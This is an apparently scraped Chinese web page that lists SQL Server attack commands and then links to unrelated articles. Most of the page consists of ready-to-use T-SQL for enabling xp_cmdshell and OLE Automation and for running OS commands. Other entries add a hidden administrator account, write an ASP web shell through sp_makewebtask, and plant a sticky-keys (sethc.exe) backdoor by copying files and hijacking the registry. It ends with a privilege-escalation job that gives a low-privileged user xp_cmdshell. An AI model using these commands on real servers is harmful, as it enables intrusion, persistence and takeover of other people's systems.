• 开启和关毕xp_cmdshell
  •  
    EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 开启xp_cmdshell
  •  
    EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;-- 关毕xp_cmdshell
  •  
    EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
  •  
    2.
  •  
    xp_cmdshell执行命令
  •  
    EXEC master..xp_cmdshell 'ipconfig'
  •  
    3.
  •  
    开启和关毕sp_oacreate
  •  
    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; 开启
  •  
    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE; 关毕
  •  
    EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
  •  
    4.
  •  
    sp_OACreate删除文件
  •  
    DECLARE @Result int
  •  
    DECLARE @FSO_Token int
  •  
    EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT
  •  
    EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile', NULL, 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\user.bat'
  •  
    EXEC @Result = sp_OADestroy @FSO_Token
  •  
    5.
  •  
    sp_OACreate复制文件
  •  
    declare @o int
  •  
    exec sp_oacreate 'scripting.filesystemobject', @o out
  •  
    exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
  •  
    6.
  •  
    sp_OACreate移动文件
  •  
    declare @aa int
  •  
    exec sp_oacreate 'scripting.filesystemobject', @aa out
  •  
    exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log', 'c:\temp\ipmi1.log';
  •  
    7.
  •  
    sp_OACreate加管理员用户
  •  
    DECLARE @js int
  •  
    EXEC sp_OACreate 'ScriptControl',@js OUT
  •  
    EXEC sp_OASetProperty @js, 'Language', 'JavaScript'
  •  
    EXEC sp_OAMethod @js, 'Eval', NULL, 'var o=new ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'
  •  
    8.
  •  
    开启和关毕sp_makewebtask
  •  
    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE; 开启
  •  
    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',0;RECONFIGURE; 关毕
  •  
    EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
  •  
    9.
  •  
    sp_makewebtask新建文件
  •  
    exec sp_makewebtask 'c:\windows.txt',' select ''<%25execute(request("a"))%25>'' ';;--
  •  
    10.
  •  
    wscript.shell执行命令
  •  
    use master
  •  
    declare @o int
  •  
    exec sp_oacreate 'wscript.shell',@o out
  •  
    exec sp_oamethod @o,'run',null,'cmd /c "net user" > c:\test.tmp'
  •  
    11.
  •  
    Shell.Application执行命令
  •  
    declare @o int
  •  
    exec sp_oacreate 'Shell.Application', @o out
  •  
    exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user >c:\test.txt','c:\windows\system32','','1';
  •  
    or
  •  
    exec sp_oamethod @o, 'ShellExecute',null, 'user.vbs','','c:\','','1';
  •  
    12.
  •  
    开启和关毕openrowset
  •  
    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; 开启
  •  
    exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',0;RECONFIGURE; 关毕
  •  
    EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE WITH OVERRIDE; 禁用advanced options
  •  
    13.
  •  
    沙盒执行命令
  •  
    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 默认为3
  •  
    select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c echo a>c:\b.txt")')
  •  
    14.
  •  
    注册表劫持粘贴键
  •  
    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution
  •  
    Options\sethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';
  •  
    15.
  •  
    sp_oacreate替换粘贴键
  •  
    declare @o int
  •  
    exec sp_oacreate 'scripting.filesystemobject', @o out
  •  
    exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
  •  
    declare @oo int
  •  
    exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
  •  
    16.
  •  
    public权限提权操作
  •  
    USE msdb
  •  
    EXEC sp_add_job @job_name = 'GetSystemOnSQL', www.2cto.com
  •  
    @enabled = 1,
  •  
    @description = 'This will give a low privileged user access to
  •  
    xp_cmdshell',
  •  
    @delete_level = 1
  •  
    EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
  •  
    @step_name = 'Exec my sql',
  •  
    @subsystem = 'TSQL',
  •  
    @command = 'exec master..xp_execresultset N''select ''''exec
  •  
    master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
  •  
    EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
  •  
    @server_name = 'SERVER_NAME'
  • EXEC sp_start_job @job_name = 'GetSystemOnSQL'
  •  

-

SQL 不常用的一些命令sp_OACreate,xp_cmdshell,sp_makewebtask的更多相关文章

  1. SQL Server常用函数及命令

    1.字符串函数 --ascii函数,返回字符串最左侧字符的ascii码值 SELECT ASCII('a') AS asciistr --ascii代码转换函数,返回指定ascii值对应的字符 SEL ...

  2. Oracle的学习一:安装与卸载、sql *plus常用命令、Oracle用户管理

    1.为什么学习oracle? 性能优越: 小型数据库 中型数据库 大型数据库 acess.foxbase mysql.sql server.informix sybase.oracle.db2 复杂量 ...

  3. 二、oracle sql*plus常用命令

    一.sys用户和system用户Oracle安装会自动的生成sys用户和system用户(1).sys用户是超级用户,具有最高权限,具有sysdba角色,有create database的权限,该用户 ...

  4. oracle sql*plus常用命令

    一.sys用户和system用户Oracle安装会自动的生成sys用户和system用户(1).sys用户是超级用户,具有最高权限,具有sysdba角色,有create database的权限,该用户 ...

  5. 二、 sql*plus常用命令

    一.sys用户和system用户Oracle安装会自动的生成sys用户和system用户(1).sys用户是超级用户,具有最高权限,具有sysdba角色,有create database的权限,该用户 ...

  6. Oracle-01-数据库分类/oracle sql*plus常用命令

    一.数据库分类 一.数据库分类1.小型数据库:access.foxbase2.中型数据库:informix.sql server.mysql3.大型数据库:sybase.db2.oracle 二.项目 ...

  7. 4.oracle sql*plus常用命令

    一.sys用户和system用户Oracle安装会自动的生成sys用户和system用户(1).sys用户是超级用户,具有最高权限,具有sysdba角色,有create database的权限,该用户 ...

  8. SQL注入常用命令

    1. 数据库查询版本 Mssql select @@version Mysql select vresion()/select @@version oracle select banner from ...

  9. sql server 常用的系统存储过程

      系统存储过程 说明 sp_databases 列出服务上的所有数据库 sp_helpdb 报告有关指定数据库或所有数据库的信息 sp_renamedb 更改数据库的名称 sp_tables 返回当 ...

随机推荐

  1. Java8-dateTimeFormatter

    时间格式化LocalDate,DateTimeFormatter--->parse,ofParttern 伴随lambda表达式.streams以及一系列小优化,Java 8 推出了全新的日期时 ...

  2. springMVC配置文件web.xml与spring-servlet.xml与spring-jdbc.xml与logback.xml与redis.properties与pom.xml

    springMVC注解:@Controller @Service @Repository 分别标注于web层,service层,dao层. web.xml <?xml version=" ...

  3. cookie and sesssion

    会话(Session)跟踪是Web程序中常用的技术,用来跟踪用户的整个会话.常用的会话跟踪技术是Cookie与Session.Cookie通过在客户端记录信息确定用户身份,Session通过在服务器端 ...

  4. 使用虚拟化KVM安装RHEL7系统

    使用虚拟化KVM安装RHEL7系统 作者:Eric 微信:loveoracle11g 检查真实物理机是否支持虚拟化功能 [root@server ~]# grep vmx /proc/cpuinfo ...

  5. 用PS做圆角图片

    ps: Adobe Photoshop CS2  如果图片被锁定,请“双击”图层中“背景”解锁,如果没有图层菜单,在最上面导航栏中:窗口—图层.如下图:  点“确定”,解锁.  选用“圆角矩形工具”. ...

  6. Java 基础测试题

    一.选择题 1.下面哪些是合法的变量名? ( DEG  ) A.2variable B. .variable2 C. ._whatavariable D._3_ E.$anothervar F.#my ...

  7. python初接触

    浑浑噩噩的过了3年多大学生涯,就借此开始下定决心好好的学好一门技术,为心中那个游戏梦而努力. 正式开课的第一天(也算不的吧,毕竟昨天老师也和我们讲了python课程的大纲内容).自我总结下今天的内容吧 ...

  8. random的常用方式

    Python中的random模块用于生成随机数 1.random.random() #用于生成一个0~1的随机浮点数:0<=n<1.0 >>> import random ...

  9. [UnityAPI]SerializedObject类 & SerializedProperty类

    以Image类为例 1.MyImage.cs using UnityEngine; using UnityEngine.UI; public class MyImage : Image { ; pro ...

  10. spring 之 注入之 by name or by type, or both ?

    @Autowired 和  @Qualifier 使用xml 注入的时候, 我们可以指定 autowire=“byType” 或“byName” . 但是使用 注解的时候, @Autowired  只 ...